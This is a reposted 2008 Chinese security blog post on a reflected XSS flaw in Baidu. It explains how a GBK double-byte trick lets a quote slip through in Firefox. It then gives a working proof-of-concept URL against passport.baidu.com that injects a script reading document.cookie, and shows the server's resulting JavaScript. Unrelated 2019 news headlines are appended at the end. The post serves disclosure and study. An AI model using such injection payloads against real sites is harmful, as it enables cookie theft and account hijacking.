百度的JS数据流注入型跨站

    [晴 July 13, 2008 22:02 | by !4p47hy ]
来源:0×37 Security

今天看到的百度贴吧XSS有属于这种类型的,不过仅在FF下有效,原因是在GBK字符集及其子集(或更高级的双字节字符集)编码环境下构造类似于包含%c1′这样的双字节字符串时,提交给服务端,返回。在这整个处理过程的任何一环节,FF都会单独处理这两个字节(%c1与’),而服务端却认为这是一个完整的双字节字符,这导致了单引号这样的特殊字符可以侥幸在FF下残留下来。IE不行,那是因为它也认为这两个字节构成了一个双字节字符。

貌似说的有点乱。

将恶意构造的数据作为参数注入到服务端返回的JS数据流中,百度似乎很容易忽略这的过滤。比如这个:
https://passport.baidu.com/?login&u=./?”</script><script>alert(document.cookie)//
打开后,服务端返回的js代码为:
<script>
var url=”./?\”</script><script>alert(document.cookie)//”
url=url.replace(/^\.\//gi,”//passport.baidu.com/“);
location.href=url;
</script>
还没修补。

Bug&Exp | Comments(0) | Trackbacks(0) | Reads(7488)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive
 
  • 革命家陈云的“五有”养生法 2019-05-21
  • 团市委组织召开区块链发展座谈会 助力西安打造“区块链之都” 2019-05-17
  • 2018年俄罗斯总统大选 2019-05-17
  • 组图:中国第一辆地铁列车时隔50年再度亮相 2019-05-17
  • 马拉维“红旗飘飘”十年间,中国工程印上了当地纸币 2019-05-13
  • 扶贫试点 保康县孩子过暖冬 2019-05-13
  • 不能让孩子输在起跑线上?来看看如何科学合理早教 2019-05-11
  • 从胡红岩到王天荣,还有多少人在无辜背案底 2019-05-11
  • 魔幻重庆的魔幻搭配 火锅竟和KTV配对 2019-05-07
  • 国际货币基金组织称土库曼斯坦缩减开支或让货币贬值 2019-05-02
  • 上饶经开区36个项目集中开工 总投资77.1亿元 2019-05-02
  • “她可能是张爱玲以后最好的中文写作者” 2019-05-02
  • 离婚案二审结束 王宝强疑与律师商讨后续应对措施 2019-04-11
  • 对中国人民而言,腐败就是从天上掉下来的,不是从人民群众中滋生出来的。 2019-04-09
  • 池州扶贫干部借“朋友圈”帮贫困户卖竹篮 2019-03-28
  • 626| 429| 807| 304| 220| 874| 795| 933| 484| 428|